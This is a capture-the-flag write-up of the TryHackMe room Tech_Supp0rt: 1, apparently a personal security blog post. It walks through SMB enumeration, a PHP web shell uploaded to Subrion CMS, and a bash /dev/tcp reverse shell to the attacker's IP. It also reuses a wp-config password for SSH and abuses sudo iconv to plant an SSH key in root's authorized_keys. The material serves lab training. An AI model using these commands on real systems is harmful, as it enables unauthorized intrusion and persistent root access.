Post

TryHackMe - Tech_Supp0rt: 1

Introduction

This is a TryHackMe room which can be found at: Tech_Supp0rt: 1

Hack into the scammer’s under-development website to foil their plans.

Reconnaissance & Scanning

Perform nmap scan to identify open ports and services.

  • Command: nmap -p- -T4 -v 10.10.182.202
1
2
3
4
5
6
7
8
9
10
11
12
geobour98@kali:~$ nmap -p- -T4 -v 10.10.182.202
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-05 19:55 EET
Nmap scan report for 10.10.182.202 (10.10.182.202)
Host is up (0.086s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 62.06 seconds

Perform aggressive nmap scan to enable OS detection, default scripts and version detection on the found ports.

  • Command: sudo nmap -A -sC -p 22,80,139,445 -v 10.10.182.202
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
geobour98@kali:~$ sudo nmap -A -sC -p 22,80,139,445 -v 10.10.182.202 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-05 19:58 EET
Nmap scan report for 10.10.182.202 (10.10.182.202)
Host is up (0.080s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 108af572d7f97e14a5c54f9e978b3d58 (RSA)
|   256 7f10f557413c71dbb55bdb75c976305c (ECDSA)
|_  256 6b4c23506f36007ca67c1173c1a8600c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (99%), Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.16 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Android 7.1.1 - 7.1.2 (92%), Linux 3.13 - 4.4 (92%), Linux 3.2 - 3.16 (92%), Linux 3.2 - 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2023-01-05T23:28:27+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-01-05T17:58:24
|_  start_date: N/A
|_clock-skew: mean: -1h49m59s, deviation: 3h10m29s, median: 0s

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   67.41 ms 10.8.0.1 (10.8.0.1)
2   74.48 ms 10.10.182.202 (10.10.182.202)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.59 seconds
  • Command: smbclient -L \\\\10.10.182.202\\ -N
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
geobour98@kali:~$ smbclient -L \\\\10.10.182.202\\ -N
                               
        Sharename       Type      Comment                                                                                     
        ---------       ----      -------
        print$          Disk      Printer Drivers
        websvr          Disk                               
        IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
                               
        Server               Comment                        
        ---------            -------                      
                               
        Workgroup            Master
        ---------            -------
        WORKGROUP

We will try to view the contents of the websvr share and download any existing files.

  • Command: smbclient \\\\10.10.182.202\\websvr -N
1
2
3
4
5
6
7
8
9
10
geobour98@kali:~$ smbclient \\\\10.10.182.202\\websvr -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May 29 10:17:38 2021
  ..                                  D        0  Sat May 29 10:03:47 2021
  enter.txt                           N      273  Sat May 29 10:17:38 2021

                8460484 blocks of size 1024. 5678116 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)

Below we see the contents of the enter.txt:

1
2
3
4
5
6
7
8
9
10
11
12
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

The password can be found by the Magic operation from: CyberChef or decoded from base58, then decoded from base32 and finally decoded from base64.

  • Command: echo "7sKvntXdPEJaxazce9PXi24zaFrLiKWCk" | base58 -d | base32 -d | base64 -d
1
2
geobour98@kali:~$ echo "7sKvntXdPEJaxazce9PXi24zaFrLiKWCk" | base58 -d | base32 -d | base64 -d                                            
Scam2021

So the credentials for subrion site are: admin:Scam2021.

Exploitation

If we navigate to http://10.10.182.202/subrion we are redirected, so we can try the panel as stated at enter.txt. So, we navigate to http://10.10.182.202/subrion/panel, we see a login page and log in with the found credentials admin:Scam2021.

This is an instance of Subrion CMS v 4.2.1, so we can search for public exploits with searchsploit on that version.

  • Command: searchsploit subrion 4.2.1
1
2
3
4
5
6
7
8
9
10
11
geobour98@kali:~$ searchsploit subrion 4.2.1
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                                     | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                                      | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                                   | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                            | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                                    | php/webapps/45150.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The most interesting is php/webapps/49876.py. After reading the code, we should upload a webshell with .phar extension, which is basically a PHP file.

So, we create a file called cmd.phar with contents:

1
2
3
<?php
system($_REQUEST['cmd']);
?>

In order to upload the file, we select Content, then Uploads and click on Upload files. Then, we select the cmd.phar file.

After uploading the file, it is shown in the Dashboard. We right-click the file and select Get info. We are provided with a link for the uploaded file which is: http://10.10.182.202/subrion/uploads/cmd.phar.

So, to verify command execution we navigate to http://10.10.182.202/subrion/uploads/cmd.phar?cmd=id.

The output is: uid=33(www-data) gid=33(www-data) groups=33(www-data), so we can get a reverse shell through Burp Suite.

Refresh the page and Intercept with Burp. Then replace the id command with bash -c 'exec bash -i >& /dev/tcp/10.8.16.74/443 0>&1' and URL-encode it with Ctrl-U.

So the request should look like this:

1
2
3
4
5
6
7
8
9
10
11
GET /subrion/uploads/cmd.phar?cmd=bash+-c+'exec+bash+-i+>%26+/dev/tcp/10.8.16.74/443+0>%261' HTTP/1.1
Host: 10.10.182.202
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: INTELLI_06c8042c3d=2vg4i4doqntpnij1dihsfbsqd3; loader=loaded
Upgrade-Insecure-Requests: 1


Then, open a netcat listener and we have a reverse shell as www-data.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
geobour98@kali:~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.8.16.74] from (UNKNOWN) [10.10.182.202] 51060
bash: cannot set terminal process group (1381): Inappropriate ioctl for device
bash: no job control in this shell
www-data@TechSupport:/var/www/html/subrion/uploads$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ww/html/subrion/uploads$ python3 -c 'import pty;pty.spawn("/bin/bash")'     
www-data@TechSupport:/var/www/html/subrion/uploads$ ^Z
zsh: suspended  nc -lvnp 443

geobour98@kali:~$ stty raw -echo;fg                   
[1]  + continued  nc -lvnp 443

<ww/html/subrion/uploads$ export TERM=xterm-256color                         
www-data@TechSupport:/var/www/html/subrion/uploads$ stty rows 27 cols 126

Now we have a fully interactive TTY shell.

After enumeration, we find an interesting file wp-config.php at /var/www/html/wordpress, which contains potential database credentials.

1
2
3
4
5
6
7
8
9
10
11
www-data@TechSupport:/var/www/html/wordpress$ cat wp-config.php
<snip>
/** The name of the database for WordPress */                                                                                 
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' ); 

/** MySQL database password */
define( 'DB_PASSWORD', '[REDACTED]' );
<snip>

We can try the found password for the user scamsite, that can be found from either /etc/passwd or /home/scamsite.

The password is valid, so we can login with SSH as the user scamsite.

  • Command: ssh scamsite@10.10.182.202
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
geobour98@kali:~$ The authenticity of host '10.10.182.202 (10.10.182.202)' can't be established.
ED25519 key fingerprint is SHA256:J/HR9GKX4ReRvs4I9fnMwmJrOTL5B3skZ4owxwxWoyM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.182.202' (ED25519) to the list of known hosts.
scamsite@10.10.182.202's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


120 packages can be updated.
88 updates are security updates.


Last login: Fri May 28 23:30:20 2021
scamsite@TechSupport:~$

Now we are the user scamsite.

Privilege Escalation

After executing the command: sudo -l we see that we can execute /usr/bin/iconv as root without being asked for root password.

We can easily read the root.txt file by executing the following command found at: https://gtfobins.github.io/gtfobins/iconv/#sudo.

  • Command: sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "/root/root.txt"
1
2
scamsite@TechSupport:~$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "/root/root.txt"
[REDACTED]

Root Shell

We could read root’s private SSH key and log in with SSH providing the id_rsa, but we are asked for password.

So, we can create our SSH keys, put the public key in /root/.ssh/authorized_keys and log in as root.

  • Command: ssh-keygen -t rsa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
geobour98@kali:~$ ssh-keygen -t rsa                                                   
Generating public/private rsa key pair.                                 
Enter file in which to save the key (/home/geobour98/.ssh/id_rsa): ./id_rsa                                                                      
Enter passphrase (empty for no passphrase):                  
Enter same passphrase again:                                            
Your identification has been saved in ./id_rsa              
Your public key has been saved in ./id_rsa.pub              
The key fingerprint is:                                                 
SHA256:ycc38+YTseWCT87FV6KlIX8V5Y9gFdLRRBgg1hSI0YA geobour98@kali
The key's randomart image is:                                                                                                                    +---[RSA 3072]----+                                                                                                                              |       .o=o+=+=O=|                                                                                                                              |      E ..o..ooo.|                                                                                                                              
|            o   o|                                                     
|       . o....+.=|                                                     
|        S oo+*.Oo|                 
|         . .=+* =|                                                     
|             *o+.|
|             o=  |                                                     
|              .. |                                                     
+----[SHA256]-----+

Two files are created: id_rsa (private key) and id_rsa.pub (public key).

We copy the contents of id_rsa.pub and run as the scamsite user in the SSH session the following command using iconv again but with the option -o in order to create a file.

1
scamsite@TechSupport:~$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEXbJCblmDCS9cWXLzrVNFMCH9YyZJPpik7xKp9fXrWn+9BjuIpCKSxJ5h1bz6TrSbDJB/tzszA8Y3GFwbT3N7frcD5FGnLKhhX9EFHMEFNJSaeLsLfPsfAL5+G9LTd2L27m227enaKOOpLUmPNuRLAduiAXLja7cTl19/9iuwtHGRMaLiXb2nVE+SuGpo5eO89xz0VsoYTXZXiiGBT8dn4Mi3inMs7EY6DLNXRU0uWM+cC/HBrmEIPZlphiXoqeY3kQv2vadYGDE22OhhkBAhhz97KC/2w/RUpfEmwgWncxZ124zRUj0insM9r/8Vmf0To7/ejkhp6UCQuOvMW67yJbQ7CCNxfggG3dGLbQkTC1lAjgb+pIg6rRfU+2w2nrol0PWFoCAmMaGUNQdJGtia8l6XMh8BkKYasV4SkIDC1ZbVM5vK8bRdneNtb4guZubKJbxVuDLQO61sxRcS0k0orDQ8zNNODloMFUKbYjrLjMhCRjihYd0JCNxbMWYnZqE=" | sudo /usr/bin/iconv -f 8859_1 -t 8859_1 -o "/root/.ssh/authorized_keys"

Then, we can login with our private SSH key as the root user.

  • Command: ssh -i id_rsa root@10.10.182.202
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
geobour98@kali:~$ ssh -i id_rsa root@10.10.182.202
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


120 packages can be updated.
88 updates are security updates.


Last login: Sun Nov 21 11:17:57 2021
root@TechSupport:~# whoami
root

Proof of Concept (PoC image): Desktop View

This post is licensed under CC BY 4.0 by the author.